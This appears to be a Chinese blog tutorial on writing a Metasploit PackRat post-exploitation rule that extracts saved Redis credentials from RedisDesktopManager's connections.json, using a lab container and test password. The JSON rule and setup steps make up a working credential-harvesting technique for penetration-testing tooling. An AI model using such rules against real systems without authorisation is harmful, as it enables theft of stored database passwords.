编写Metasploit的PackRat模块获取RDM密码

前言

  • 两年没看过metasploit的代码了,今天在朋友圈看到电视剧《你安全吗》用到了metasploit,所以更新了一下代码,看到之前写的凭证收集的模块都替换为PackRat了。
  • PackRat是一个后渗透模块,从用户的系统中收集文件和信息的工具。PackRat使用regexp、JSON、XML和SQLite查询搜索和下载感兴趣的文件(如配置文件、接收和删除的电子邮件),并提取信息(如联系人、用户名和密码)。
  • 简单来说就是把信息收集写成像nuclei那样使用规则去获取,这样就不用写代码了。

环境搭建

  • 找了一个简单的软件作为例子,Redis的图形化客户端https://github.com/uglide/RedisDesktopManager
  • redis服务器搭建,连上去设置密码为:my_redis
☁  ~  docker run -it -p 6379:6379 redis:latest
root@082845d25224:/bin# redis-cli -h 127.0.0.1 -p 6379 
127.0.0.1:6379> keys * 
(empty array)
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) ""
127.0.0.1:6379> config set requirepass my_redis
OK
127.0.0.1:6379> config get requirepass
1) "requirepass"
2) "my_redis"

Untitled

  • 配置文件:C:\Users\FireEye\.rdm\connections.json
[
    {
        "auth": "my_redis",
        "cluster_host_override": true,
        "db_scan_limit": 20,
        "host": "10.168.1.201",
        "keys_pattern": "*",
        "name": "T",
        "namespace_separator": ":",
        "port": 6379,
        "ssh_agent_path": "",
        "ssh_password": "",
        "ssh_private_key_path": "",
        "ssl_ignore_all_errors": false,
        "timeout_connect": 60000,
        "timeout_execute": 60000,
        "username": "A" //这个是我加上去测试的
    }
]

编写PackRat规则

  • 首先ProfileDir这个是userprofile中的键,详细可以看我写的模块编写文章中的获取用户配置,调试看到就是这样的:
[1] pry(#<Msf::Modules::Post__Windows__Gather__Credentials__Rdm::MetasploitModule>)> userprofile                                                               
=> {"SID"=>"S-1-5-21-1546888072-418879536-4029880489-1001",                                                                                                    
 "ProfileDir"=>"C:\\Users\\FireEye",                                                                                                                           
 "AppData"=>"C:\\Users\\FireEye\\AppData\\Roaming",                                                                                                            
 "LocalAppData"=>"C:\\Users\\FireEye\\AppData\\Local",                                                                                                         
 "LocalSettings"=>nil,                                                                                                                                         
 "Desktop"=>"C:\\Users\\FireEye\\Desktop",                                                                                                                     
 "MyDocs"=>"C:\\Users\\FireEye\\Documents",                                                                                                                    
 "Favorites"=>"C:\\Users\\FireEye\\Favorites",                                                                                                                 
 "History"=>"C:\\Users\\FireEye\\AppData\\Local\\Microsoft\\Windows\\History",                                                                                 
 "Cookies"=>"C:\\Users\\FireEye\\AppData\\Roaming\\Microsoft\\Windows\\Cookies",                                                                               
 "Temp"=>"C:\\Users\\FireEye\\AppData\\Local\\Temp\x00",                                                                                                       
 "Path"=>                                                                                                                                                      
  "C:\\Users\\FireEye\\scoop\\apps\\openjdk\\current\\bin;C:\\Users\\FireEye\\scoop\\apps\\yarn\\current\\global\\node_modules\\.bin;C:\\Users\\FireEye\\scoop\
\apps\\yarn\\current\\Yarn\\bin;C:\\Users\\FireEye\\scoop\\apps\\nodejs\\current\\bin;C:\\Users\\FireEye\\scoop\\apps\\nodejs\\current;C:\\Users\\FireEye\\scoo
p\\apps\\python\\current\\Scripts;C:\\Users\\FireEye\\scoop\\apps\\python\\current;C:\\Users\\FireEye\\go\\bin;C:\\Users\\FireEye\\scoop\\apps\\gcc\\current\\b
in;C:\\Users\\FireEye\\scoop\\apps\\openssl\\current\\bin;C:\\Users\\FireEye\\scoop\\shims;C:\\Users\\FireEye\\AppData\\Roaming\\Python\\Python39\\Scripts;C:\\
Users\\FireEye\\AppData\\Roaming\\npm;C:\\Program Files\\Azure Data Studio\\bin\x00",                                                                          
 "UserName"=>"FireEye",                                                                                                                                        
 "Domain"=>"WIN-79MR8QJM50N"}
  • 所以呢可以通过这里的键快速找到用户对应的路径。
{
      application: 'redis_desktop_manager',
      app_category: 'redis',
      gatherable_artifacts: [
        {
          filetypes: 'logins',
          path: 'ProfileDir',//上面说的用户路径
          dir: '.rdm', //软件配置文件夹
          artifact_file_name: 'connections.json',//保存了密码的文件
          description: "RedisDesktopManager's saved Username and Password ",
          credential_type: 'json',
          json_search: [
            {
              json_parent: "",
              json_children: [// 要提取的键
                "['name']",
                "['username']",
                "['auth']",
                "['host']",
                "['port']",
              ]
            }
          ]
        }
      ]
    }
  • 运行效果

Untitled

参考

https://github.com/rapid7/metasploit-framework/pull/17006